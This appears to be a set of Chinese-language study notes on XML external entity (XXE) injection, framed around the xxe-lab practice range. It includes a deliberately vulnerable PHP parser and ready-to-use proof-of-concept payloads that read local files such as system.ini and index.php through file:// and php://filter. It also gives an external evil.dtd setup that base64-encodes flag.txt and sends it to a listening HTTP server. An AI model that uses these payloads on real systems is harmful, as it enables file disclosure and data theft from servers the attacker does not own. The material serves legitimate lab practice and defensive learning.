<?php
$xmlfile = file_get_contents('php://input');
$creds=simplexml_load_string($xmlfile);
echo $creds;
?>POC:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds [
<!ENTITY goodies SYSTEM "file:///c:/windows/system.ini"> ]>
<creds>&goodies;</creds>与1.1不一样的是,引入的外部的dtd
POC:
**********
post提交的数据:
<?xml version="1.0"?>
<!DOCTYPE creds SYSTEM "http://127.0.0.1/test/evil.dtd">
<creds>&b;</creds>
**********
http://127.0.0.1/test/evil.dtd的数据
<!ENTITY b SYSTEM "file:///c:/windows/system.ini">********
post:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds [
<!ENTITY % goodies SYSTEM "http://127.0.0.1/test/evil.dtd">
%goodies;
]>
<creds>&b;</creds>
********
evil.dtd
<!ENTITY b SYSTEM "file:///c:/windows/system.ini">| 当里面含有<,&时候,上边的方法用file协议读不出文件 |
如果是php的话,可以用php的filter协议直接读出文件
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds [
<!ENTITY goodies SYSTEM "php://filter/read=convert.base64-encode/resource=index.php"> ]>
<creds>&goodies;</creds><[CDATA["和 “]]> 拼接引用的内容,就可以正常输出
**********
post提交的数据:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [
<!ENTITY % start "<![CDATA[">
<!ENTITY % goodies SYSTEM "file:///C:/softeware/phpstudy/PHPTutorial/WWW/test/index.php">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://127.0.0.1/test/evil.dtd">
%dtd; ]>
<roottag>&all;</roottag>
*********
evil.dtd的内容
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY all "%start;%goodies;%end;">**********
post:
<!DOCTYPE convert [
<!ENTITY % remote SYSTEM "http://127.0.0.1/test/evil.dtd">
%remote;%int;%send;
]>
**********
evil.dtd的内容
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/test/flag.txt">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://127.0.0.1:9999?p=%file;'>">
***********
python3 -m http.server 9999最后引用实体的时候,老忘了打分号。
&goodies; 没有回显的时候,要注意用filter结合file的绝对路径
filter可以不用绝对路径,但是有时候你是访问你的index.html,php文件不一定是index.php。
靶场练习;
https://github.com/c0ny1/xxe-lab
原文:https://www.cnblogs.com/zaqzzz/p/11742140.html